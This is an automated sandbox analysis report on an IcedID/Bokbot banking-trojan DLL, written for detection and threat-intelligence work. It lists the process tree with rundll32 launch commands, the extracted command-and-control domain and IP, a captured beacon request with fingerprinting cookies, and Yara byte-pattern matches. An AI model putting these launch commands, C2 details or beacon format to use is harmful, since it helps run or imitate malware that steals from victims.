Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
y2D56.tmp.dll

Overview

General Information

Sample Name:y2D56.tmp.dll
Analysis ID:682775
MD5:363777daf36e9534762d30bd4bf22c74
SHA1:ea94d9afd355dd23a069f21b3562d85a4266da4f
SHA256:8cd135e5b49d16aceb7665b6316cd4df2e132ef503ff0af51c080bad7010efd6
Tags:BokbotDLLexeIcedID
Infos:

Detection

IcedID
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Yara detected IcedID
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
PE file does not import any functions
Yara signature match
PE file contains an invalid checksum
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers

Classification

Process Tree

  • System is w10x64
  • loaddll64.exe (PID: 3960 cmdline: loaddll64.exe "C:\Users\user\Desktop\y2D56.tmp.dll" MD5: 4E8A40CAD6CCC047914E3A7830A2D8AA)
    • cmd.exe (PID: 1944 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",#1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • rundll32.exe (PID: 2700 cmdline: rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",#1 MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 4956 cmdline: rundll32.exe C:\Users\user\Desktop\y2D56.tmp.dll,JfUksQmDGYQRSQfC MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 2264 cmdline: rundll32.exe C:\Users\user\Desktop\y2D56.tmp.dll,MVeMOgOlu MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 4040 cmdline: rundll32.exe C:\Users\user\Desktop\y2D56.tmp.dll,OnqcowdLVOpj MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 5672 cmdline: rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",JfUksQmDGYQRSQfC MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 5652 cmdline: rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",MVeMOgOlu MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 3976 cmdline: rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",OnqcowdLVOpj MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 3516 cmdline: rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",aXXRQNg MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 3568 cmdline: rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",agetCYHzlW MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup

Malware Configuration

Threatname: IcedID

{"Campaign ID": 3570055661, "C2 url": "alexbionka.com"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.432152014.00000212820D0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_IcedID_1Yara detected IcedIDJoe Security
    00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmpWindows_Trojan_IcedID_11d24d35unknownunknown
    • 0x3d0:$a2: loader_dll_64.dll
    00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_IcedID_0b62e783unknownunknown
    • 0x876:$a: 89 44 95 E0 83 E0 07 8A C8 42 8B 44 85 E0 D3 C8 FF C0 42 89 44
    00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_IcedID_91562d18unknownunknown
    • 0x1bc4:$a: 44 8B 4C 19 2C 4C 03 D6 74 1C 4D 85 C0 74 17 4D 85 C9 74 12 41
    00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_IcedID_48029e37unknownunknown
    • 0x1190:$a: 48 C1 E3 10 0F 31 48 C1 E2 20 48 0B C2 0F B7 C8 48 0B D9 8B CB 83 E1
    Click to see the 8 entries

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    3.2.rundll32.exe.212802e97b8.1.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
    • 0x1bd0:$internal_name: loader_dll_64.dll
    • 0x1f08:$string6: WINHTTP.dll
    • 0x1bf4:$string7: DllRegisterServer
    • 0x1c06:$string8: PluginInit
    3.2.rundll32.exe.212802e97b8.1.unpackWindows_Trojan_IcedID_11d24d35unknownunknown
    • 0x1bd0:$a2: loader_dll_64.dll
    3.2.rundll32.exe.212802e97b8.1.unpackWindows_Trojan_IcedID_91562d18unknownunknown
    • 0x13c4:$a: 44 8B 4C 19 2C 4C 03 D6 74 1C 4D 85 C0 74 17 4D 85 C9 74 12 41
    3.2.rundll32.exe.212802e97b8.1.unpackWindows_Trojan_IcedID_48029e37unknownunknown
    • 0x990:$a: 48 C1 E3 10 0F 31 48 C1 E2 20 48 0B C2 0F B7 C8 48 0B D9 8B CB 83 E1
    3.2.rundll32.exe.180000000.0.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
    • 0x27d0:$internal_name: loader_dll_64.dll
    • 0x3198:$string0: _gat=
    • 0x3048:$string1: _ga=
    • 0x30a0:$string2: _gid=
    • 0x3118:$string3: _u=
    • 0x303a:$string4: _io=
    • 0x3054:$string5: GetAdaptersInfo
    • 0x2b08:$string6: WINHTTP.dll
    • 0x27f4:$string7: DllRegisterServer
    • 0x2806:$string8: PluginInit
    • 0x3134:$string9: POST
    Click to see the 14 entries

    Sigma Signatures

    No Sigma rule has matched

    Snort Signatures

    No Snort rule has matched

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus / Scanner detection for submitted sample
    Source: y2D56.tmp.dllAvira: detected
    Multi AV Scanner detection for submitted file
    Source: y2D56.tmp.dllVirustotal: Detection: 14%Perma Link
    Antivirus detection for URL or domain
    Source: alexbionka.comAvira URL Cloud: Label: malware
    Source: http://alexbionka.com/QpkOAvira URL Cloud: Label: malware
    Source: http://alexbionka.com/Avira URL Cloud: Label: malware
    Source: http://alexbionka.com/UNAvira URL Cloud: Label: malware
    Source: http://alexbionka.com:80/hAvira URL Cloud: Label: malware
    Multi AV Scanner detection for domain / URL
    Source: alexbionka.comVirustotal: Detection: 9%Perma Link
    Yara detected IcedID
    Source: Yara matchFile source: 3.2.rundll32.exe.212802e97b8.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 00000003.00000002.432152014.00000212820D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2700, type: MEMORYSTR
    Source: Yara matchFile source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE
    Source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: IcedID {"Campaign ID": 3570055661, "C2 url": "alexbionka.com"}
    Source: y2D56.tmp.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

    Networking

    barindex
    System process connects to network (likely due to code injection or exploit)
    Source: C:\Windows\System32\rundll32.exeNetwork Connect: 64.227.108.27 80Jump to behavior
    Source: C:\Windows\System32\rundll32.exeDomain query: alexbionka.com
    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractorURLs: alexbionka.com
    Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3570055661:1:4060:115; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333734363533:616C666F6E73:30394232333031304432353637323145; __io=0; _gid=67AFEDD28876Host: alexbionka.com
    Source: Joe Sandbox ViewIP Address: 64.227.108.27 64.227.108.27
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 11 Aug 2022 22:28:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 30 63 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 6c 65 78 62 69 6f 6e 6b 61 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 10c<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at alexbionka.com Port 80</address></body></html>0
    Source: rundll32.exe, 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://alexbionka.com/
    Source: rundll32.exe, 00000003.00000002.432152014.00000212820D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://alexbionka.com/QpkO
    Source: rundll32.exe, 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://alexbionka.com/UN
    Source: rundll32.exe, 00000003.00000002.432152014.00000212820D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://alexbionka.com:80/h
    Source: unknownDNS traffic detected: queries for: alexbionka.com
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3570055661:1:4060:115; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333734363533:616C666F6E73:30394232333031304432353637323145; __io=0; _gid=67AFEDD28876Host: alexbionka.com

    E-Banking Fraud

    barindex
    Yara detected IcedID
    Source: Yara matchFile source: 3.2.rundll32.exe.212802e97b8.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 00000003.00000002.432152014.00000212820D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2700, type: MEMORYSTR
    Source: Yara matchFile source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE

    System Summary

    barindex
    Malicious sample detected (through community Yara rule)
    Source: 3.2.rundll32.exe.212802e97b8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
    Source: 3.2.rundll32.exe.212802e97b8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
    Source: 3.2.rundll32.exe.212802e97b8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
    Source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPEMatched rule: Detects IceID / Bokbot variants Author: ditekSHen
    Source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
    Source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_0b62e783 Author: unknown
    Source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
    Source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
    Source: 3.2.rundll32.exe.212802e97b8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects IceID / Bokbot variants Author: ditekSHen
    Source: 3.2.rundll32.exe.212802e97b8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
    Source: 3.2.rundll32.exe.212802e97b8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_0b62e783 Author: unknown
    Source: 3.2.rundll32.exe.212802e97b8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
    Source: 3.2.rundll32.exe.212802e97b8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
    Source: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
    Source: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_0b62e783 Author: unknown
    Source: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
    Source: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
    Source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
    Source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_0b62e783 Author: unknown
    Source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
    Source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
    Source: Process Memory Space: rundll32.exe PID: 2700, type: MEMORYSTRMatched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
    Source: y2D56.tmp.dllStatic PE information: No import functions for PE file found
    Source: 3.2.rundll32.exe.212802e97b8.1.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
    Source: 3.2.rundll32.exe.212802e97b8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
    Source: 3.2.rundll32.exe.212802e97b8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
    Source: 3.2.rundll32.exe.212802e97b8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
    Source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
    Source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
    Source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
    Source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
    Source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
    Source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
    Source: 3.2.rundll32.exe.212802e97b8.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
    Source: 3.2.rundll32.exe.212802e97b8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
    Source: 3.2.rundll32.exe.212802e97b8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
    Source: 3.2.rundll32.exe.212802e97b8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
    Source: 3.2.rundll32.exe.212802e97b8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
    Source: 3.2.rundll32.exe.212802e97b8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
    Source: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
    Source: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
    Source: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
    Source: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
    Source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
    Source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
    Source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
    Source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
    Source: Process Memory Space: rundll32.exe PID: 2700, type: MEMORYSTRMatched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800024FC3_2_00000001800024FC
    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FFA65C55FE6 NtCreateSection,NtMapViewOfSection,3_2_00007FFA65C55FE6
    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FFA65C55FF9 NtCreateSection,3_2_00007FFA65C55FF9
    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,3_2_000000018000108C
    Source: y2D56.tmp.dllVirustotal: Detection: 14%
    Source: y2D56.tmp.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\y2D56.tmp.dll,JfUksQmDGYQRSQfC
    Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\y2D56.tmp.dll"
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",#1
